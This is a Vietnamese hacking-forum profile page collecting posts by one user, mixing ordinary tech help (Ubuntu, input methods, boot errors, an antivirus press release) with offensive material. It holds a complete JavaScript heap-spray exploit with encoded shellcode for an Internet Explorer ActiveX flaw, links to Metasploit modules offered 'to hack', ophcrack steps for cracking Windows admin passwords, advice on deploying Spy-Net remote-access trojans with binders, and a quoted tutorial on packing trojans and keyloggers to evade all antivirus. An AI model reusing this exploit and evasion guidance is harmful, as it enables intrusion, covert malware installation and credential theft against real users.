banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: holiganvn  XML
Profile for holiganvn Messages posted by holiganvn [ number of posts not being displayed on this page: 1 ]
 
khi nó gần boot vào win thì ứng dụng ophcrack sẽ giúp bác show mật khẩu win XP chứ không clear nó như đĩa hiren boot,bạn nên làm cái usb boot(đã có link hướng dẫn) cho nó tiện sử dụng
đây là các câu lệnh tạo Shortcut,bạn click chuột phải trên màn hình desktop,chọn New,chọn Shortcut ở dưới folder,sau đó type câu lệnh vào ,click next,sẽ xuất hiện 1 file thực thi trên màn hình desktop,đây là 1 lối tắt giúp bạn khởi động nhanh 1 ứng dụng nào đó trong win,vd:câu lệnh dưới sẽ mở Control Panel

"rundll32 shell32,Control_RunDLL" - Run Control Panel


mở cửa sổ màn hình màn hình xanh "chết chóc"(Blue Screen Of Death)

"rundll32 user,disableoemlayer" - Hiển thị cửa sổ BSOD
chú ý '''(BSOD) = Blue Screen Of Death '''


lưu ý:chỉ type rundll32 shell32,Control_RunDLL thôi

link bài viết Windows Hacking Rundll32 Shortcuts của bác LeonHart:

Code:
/hvaonline/readingRoom/item/296.html

Ikut3 wrote:
Cái CEH này nên đi học vì có học thì ta mới có môi trường tiếp cận với những người cũng nung nấu í tưởng thành hacker , rồi sẽ có thảo luận tranh luận , lâu lâu còn được nghe các thầy nổ đôm đốp nữa .Thế nên có download 1 đống tool đống sách hay video gì gì chăng nữa cũng không được môi trường giảng dạy đâu


Với lương tâm của một hacker chân chính nhằm bảo vệ tổ chức chống lại các tấn công từ những mục đích nguy hiểm, pháp luật đôi lúc chỉ có giới hạn và không thể đáp ứng ngay lập tức với các tấn công.  


Đoạn này nghe như lời đảng kêu gọi toàn dân khách chiến ấy.smilie  


@Ikut3:bác không nên xuyên tạc giữa 1 câu nói "lịch sử" với 1 câu nói như trên smilie
bạn nên quét sạch virus trong PC của mình,sau đó ra quán,có phần mềm đóng băng rồi fomat usb đó đi,trước khi quét virus nên tắt system restore,sau đó boot vào safe mode để quét
bạn thử dùng 2 cái này:

Code:
http://www.namsao.com.vn/news_details.asp?newsID=NEW_050502092211
 http://www.sharewareconnection.com/password-protect-usb.htm
download ophcrack livecd,sau đó đánh ra đĩa bỏ vào cho nó chạy để crack pass admin




download:

Code:
http://sourceforge.net/projects/ophcrack/files/ophcrack-livecd/ophcrack-xp-livecd-2.3.0.iso/download


trang chủ:

Code:
http://ophcrack.sourceforge.net/


còn nếu không có ổ cd hay ổ cd bị khóa thì bác có thể tạo usb boot ophcrack,hướng dẫn:

Code:
http://vnnewbies.com/tao-usb-ophcrack-de-lay-password-cua-windows-xpvista/
bạn thử đăng nhập vào quyền admin hoặc nâng quyền cho Limited User coi có share được không,tham khảo thêm:

Code:
http://www.nhatnghe.com/forum/showthread.php?p=103926#post103926
không có link mediafire hả bác smilie
up lên phiên bản vBulletin mới nhất đi bạn ,mới nhất là phiên bản vBulletin 4.0 Alpha

Đông Chí wrote:
Tiện đây cho em hỏi, nếu một file lớn mình chia nhỏ ra rồi gửi từng phần lên trang Virus Total, nếu file đó có virus mà mình chia (split) như vậy thì nó có phát hiện ra virus không bác. 


chắc không phát hiện được,vì cấu trúc file đã bị thay đổi,nếu bạn ngại up lên các trang trên thì nên sử dụng Kims.2.0 như trên

thereaperl wrote:

Bác nào pro phá được Phần mềm Winlock này không vậy. Em ở chung phòng với 1 tên IT và thường bị hắn chôm trỉa data, em có cài Winlock pro 4.63 và bị phá bởi hắn ngay lập tức. Em không hiểu nó tồn tại services nào đó đang chạy, hoặc bị khai thác vào điểm yếu hay không nữa. Mong các bác chỉ giúp.
Còn chuyện phá Bios, boot, hay đặc biệt hơn là mở thùng máy thì không tính đến. Các tiện ích như CMD, run, driver... đã bị khóa không truy cập.
Cảm ơn mọi người nhiều! 


bạn có thể vào diễn đàn dưới để tìm sự giúp đỡ

Code:
http://www.crystaloffice.com/forum/viewforum.php?f=3
bữa nay có nhiều bác "tự sướng quá" smilie

soartor wrote:
Mình muốn cài Unix trên máy tính để bàn của mình. Theo mình biết khi nói về Unix thì có 3 hãng nỗi bật nhất là Canonical với Ubuntu, openSUSE của Novell và Fedora của nhóm Red Hat. Mình không biết máy mình nên cài phiên bản phần mềm nào thì thích hợp
Cấu hình máy mình: P4 3Ghz, DDR2 2GB, HDD Seagate 80GB, card VGA onboard 286MB.

Thanks! smilie 


máy bác cấu hình khá tốt,nên xài Ubuntu bởi vì ubuntu được cộng đồng linux việt nam sử dụng đông đảo,hoặc BackTrack ,download:


Code:
http://www.remote-exploit.org/backtrack_download.html
nếu bác muốn kiểm tra thì up file đó lên 2 trang này để scan coi có virus không:

Code:
http://www.virustotal.com
 http://scanner.novirusthanks.org


hoặc bạn xài chương trình này:




download:

Code:
http://narod.ru/disk/10782788000/Kims.2.0.rar.html

Kaito Kid X wrote:
Ạnh ơi cho em hỏi, như em thấy thì đây là cái bug trên milworn
em còn là newbe nên không biết gì nhiều
muốn hỏi anh là sao anh biết đoạn mã trên là perk trong đó nó đâu có ghi gì đâu?
em cảm ơn anh nhiều  


bạn vào google tìm kiếm: "how to use perl exploit" để biết cách sử dụng
bạn nên kiếm con spy-net bản tiếng anh ấy,dễ dùng hơn,bên cạnh đó nếu muốn sử dụng RAT tốt thì nên tìm hiểu và sử dụng tốt các soft như no-ip,binder smilie

Shikuro wrote:
Mình dùng linux, đã install như trên, tuy nhiên vẫn bị


Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at a.pl line 7.
BEGIN failed--compilation aborted at a.pl line 7.
 

Mong bạn giúp mình khắc phục 



vào ter gõ:

Code:
sudo apt-get install perl
đây là đoạn sh3llode hoàn chỉnh

Code:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
"%u314e%u7475%u7038%u7765%u4370");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';





Thử nghiệm thành công trên nền tảng sau đây (đầy đủ patched 06/07/09):

- Trình duyệt Internet Explorer 6, Windows XP SP2
- Trình duyệt Internet Explorer 7, Windows XP SP3

đây là đoạn 2 đoạn Ruby script được xây dựng để kích hoạt lỗi:

http://www.rec-sec.com/exploits/msf/msvidctl_mpeg2.rb

http://www.rec-sec.com/code/msvidctl_gif.rb

download ruby : http://www.ruby-lang.org/en/

update bản metasploit mới nhất về để hack


ai dùng linux thì vào thư mục của metasploit rồi gõ lệnh : svn update ,để update những gì mới nhất trong kho của metasploit


hường dẫn sử dụng metasploit:

Code:
http://thegioimang.org/forum/tham-nhap-trong-microsoft/1515-tam-quan-trong-cua-update-metasploit-attack.html


mã exploit mà AVG cũng chặn,công nhận bác AVG nhạy thật
bạn nên liên hệ công ty sản xuất phần mềm kế toán đó để cài đặt lại cho chắc,phí cài đặt từ 500k>>1 tr smilie

LeVuHoang wrote:
Có bác nào biết cách hoạt động của cái core này không nhỉ? Tui chưa có time down về nữa, bác Đức hay bác Thug vào làm 1 bài cái smilie 



CMCxEmu (emulator) là một công nghệ cao, được CMC InfoSec phát triển thành công và tích hợp vào engine (phần cốt lõi của phần mềm) của CMC Antivirus / CMC Internet Security (CMC AV / CMC IS). Nhờ công nghệ này, một máy ảo với đầy đủ CPU, thanh nhớ RAM, các hàm API của Windows ... được tạo ra ngay trong CMC AV / CMC IS.

Virus/mã độc "tưởng" đây là môi trường máy tính của nạn nhân, lộ nguyên hình khi thoải mái thực thi các mã lệnh độc, gây hại trong môi trường ảo này. CMC AV / CMC IS sẽ dựa vào hành vi của virus để đưa ra kết luận chính xác cho quá trình xác thực và diệt virus. Nói đơn giản công nghệ này xây dựng một môi trường giống hệt môi trường thực để cho virus thực hiện các trò chơi của mình.

Điểm mấu chốt trong việc phát triển emulator là phải hỗ trợ hầu hết các chỉ lệnh của CPU x86 (gần 150 chỉ lệnh), từ đó mới có thể chạy giả lập virus/mã độc trong môi trường ảo (Emulator là một thuật ngữ được sử dụng để chỉ việc tạo ra một máy “ảo” chạy trên máy thật mà có chức năng và hoạt động tương tự như máy thật).

Công nghệ CMCxEmu có những ứng dụng lớn, nó được dùng để: Unpuck; phát hiện các dòng virus đa hình (Polymorphic); Phát triển engine “unpacker” để phát hiện các loại pack mà virus/mã độc sử dụng (packer nói chung là công nghệ để bảo vệ các file thực thi và được Vxers (những kẻ viết virus) sử dụng rất rộng rãi trong việc mã hóa virus để chống lại sự phát hiện của các chương trình diệt virus.

"Việc đưa công nghệ CMCxEmu vào trong Engine đã khiến cho khả năng phát hiện các dòng virus đa hình (polimorphic) của CMC Antivirus/ CMC Internet Security được cải tiến đáng kể, phát hiện nhiều hơn với cùng một dòng virus/mã độc. Đồng thời tăng cường khả năng làm sạch các tập tin bị nhiễm bởi các dòng virus lây file. Hiện CMC InfoSec vẫn không ngừng cải tiến, phát triển công cụ này nâng cao khả năng phát hiện và diệt virus của CMC Internet Security ", ông Vũ Lâm Bằng, Giám đốc Trung tâm R&D CMC cho biết.

Theo ông Nguyễn Hoàng Giang, Trưởng nhóm phân tích virus CMC InfoSec cho biết thêm: “Việc đưa emulator vào engine của CMC Internet Security giúp nâng cao khả năng phát hiện các loại virus/mã độc, phát hiện được nhiều hơn với cùng một dòng virus/mã độc nhưng đã được thay đổi mã bằng cách sử dụng packer, hay các trình bảo vệ khác để chống lại sự phát hiện của các chương trình diệt virus.

Với engine thông thường, mặc dù cùng là thuộc một dòng virus/mã độc nhưng nếu không có emulator, thì chương trình diệt virus đó có thể thông báo là hai loại virus/mã độc khác nhau, chương trình antivirus phải cập nhật dữ liệu nhiều hơn đồng nghĩa với việc khả năng bắt virus/mã độc là thấp hơn cho cùng một dòng”
bạn diệt hết tất cả virus đã rồi tải cái này về phục hồi các chắc năng của win:


http://sourceforge.net/projects/viruseffectremo/
Từ ngày 6/7/2009, CMC Antivirus/CMC Internet Security đã được tích hợp công nghệ CMCxEmu, một công nghệ mới tiên tiến hàng đầu thế giới cho phép giả lập một môi trường ảo để virus thực thi các mã lệnh ngay trong phần mềm diệt virus.

CMCxEmu (emulator) là một công nghệ cao, được CMC InfoSec phát triển thành công và tích hợp vào engine (phần cốt lõi của phần mềm) của CMC Antivirus / CMC Internet Security (CMC AV / CMC IS). Nhờ công nghệ này, một máy ảo với đầy đủ CPU, thanh nhớ RAM, các hàm API của Windows ... được tạo ra ngay trong CMC AV / CMC IS. Virus/mã độc "tưởng" đây là môi trường máy tính của nạn nhân, lộ nguyên hình khi thoải mái thực thi các mã lệnh độc, gây hại trong môi trường ảo này. CMC AV / CMC IS sẽ dựa vào hành vi của virus để đưa ra kết luận chính xác cho quá trình xác thực và diệt virus. Nói đơn giản công nghệ này xây dựng một môi trường giống hệt môi trường thực để cho virus thực hiện các trò chơi của mình.

Điểm mấu chốt trong việc phát triển emulator là phải hỗ trợ hầu hết các chỉ lệnh của CPU x86 (gần 150 chỉ lệnh), từ đó mới có thể chạy giả lập virus/mã độc trong môi trường ảo (Emulator là một thuật ngữ được sử dụng để chỉ việc tạo ra một máy “ảo” chạy trên máy thật mà có chức năng và hoạt động tương tự như máy thật).

Đây là bản cập nhật nhật thứ 4, được CMC InfoSec phát hành ngày 6 /7/2009 thực sự là một bước tiến dài về khả năng phát hiện cũng như khả năng diệt virus của phần mềm CMC.

download:

http://cmcinfosec.com/download.php

bác nào thích vọc virus tải cái này về ngay nhé smilie
có thể máy bạn bị lỗi NTLDR IS MISSING,vào đây để biết cách khắc phục:

Code:
http://www.vn-zoom.com/f228/khac-phuc-loi-ntldr-is-missing-2949.html
do đĩa cài win đấy bạn,bạn nên mua cái đĩa mới hoặc chuyển qua xài linux smilie
@freeze_love:.ar là tên miền của argentina

@lenhan555:làm theo cái tut này coi sao


Code:
This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO! First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.
My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.
Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!
1st Step:
Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
 http://nct.digitalriver.com/fulfill/0161.001
There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
2nd Step:
Once you download the program, install it.
3rd Step:
Once installed, you open it up
Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!
ok now Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.
DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
 http://rapidshare.com/files/8749860/projects.arm.html
Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).
Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!
Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.
Now, once its created, they are %100 undetectable.
Go to
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!



video:


http://str0ke213.tradebit.com/pub/8/77.flv
bạn nên dùng scim-unikey,bộ gõ này cài đặt dễ hơn xvnkb ,vào đây chọn phiên bản xvnkb 0.3 mới nhất ,tương thích với ver của ubuntu của mình:


http://code.google.com/p/scim-unikey/downloads/list

xem hướng dẫn cài đặt ở đây

http://forum.ubuntu-vn.org/viewtopic.php?f=85&t=2165

freeze_love wrote:
Y' kamikazeq la` máy đã "Từng" cài TeamViewer (hợp pháp) thì vẫn bị máy đối phương dùng RAT để xem desktop hả?
 


hoàn toàn đúng smilie

khigiadano wrote:
Biến thành RAT là sao vậy bạn
Giải thích hộ mình được ko ?? smilie  


RAT là viết tắt của Remote Administration Tools,dịch nôm na là phần mềm điều khiển từ xa,chương trình TeamViewer trước kia là phần mề điều khiển từ xa hợp pháp ,nay bị "chế" lại thành 1 Remote Administration Tools có chức năng như 1 tr0jan,cài đặt bất hợp pháp vào máy victim smilie

xem thêm:

http://en.wikipedia.org/wiki/Remote_Administration_Tool
 
Go to Page:  First Page Page 7 8 9 10 Page 12 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|